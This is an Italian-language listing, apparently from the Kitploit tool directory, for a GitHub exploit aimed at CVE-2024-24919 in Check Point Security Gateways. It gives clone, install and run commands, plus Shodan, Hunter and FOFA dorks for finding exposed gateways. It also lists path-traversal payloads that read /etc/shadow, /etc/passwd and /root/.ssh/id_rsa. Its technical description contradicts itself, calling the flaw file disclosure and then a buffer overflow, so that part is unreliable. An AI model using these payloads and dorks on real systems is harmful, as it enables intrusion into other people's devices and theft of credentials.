Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-24919 — CVE-2024-24919 exploit | Kitploit
Strumenti/GitHubGitHub/goatsecurity/cve-2024-24919
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubgoatsecurity/cve-2024-24919

CVE-2024-24919

CVE-2024-24919 exploit

Vedi Repository
20112 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumento di Exploit RCE per Check Point Security Gateway (CVE-2024-24919)

Panoramica

Questo repository contiene uno strumento per sfruttare la vulnerabilità CVE-2024-24919 nei Check Point Security Gateway. Lo strumento è un multi-scanner in grado di identificare dispositivi vulnerabili e un exploit per singolo bersaglio che può prendere il controllo completo del dispositivo interessato.

CVE-2024-24919 è una vulnerabilità di divulgazione di informazioni ad alta gravità che consente a un attaccante di leggere file arbitrari da remoto su un Check Point Security Gateway. Questa vulnerabilità può essere sfruttata per rubare informazioni sensibili, come password e file di configurazione.

Disclaimer:

Questo strumento è fornito solo a scopo educativo. Non deve essere utilizzato per attaccare sistemi vulnerabili senza il consenso esplicito del proprietario. Gli autori di questo strumento non sono responsabili per eventuali danni derivanti dal suo utilizzo.

Come funziona

L'exploit funziona inviando una richiesta HTTP appositamente predisposta al dispositivo vulnerabile. La richiesta innesca un buffer overflow nel firmware del dispositivo, che consente all'attaccante di eseguire codice arbitrario. L'exploit può quindi essere utilizzato per prendere il controllo completo del dispositivo.

Requisiti

  • Python 3
  • colorama
  • requests

Installazione

root@kitploit:~
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

Utilizzo

Puoi scansionare un singolo bersaglio o multipli!

root@kitploit:~
python cve-2024-24919.py

**Dorks **

root@kitploit:~
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

** Screenshot dello strumento **

ss

$ Percorsi dello strumento :

root@kitploit:~
    ```
    
    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
Scarica lo strumento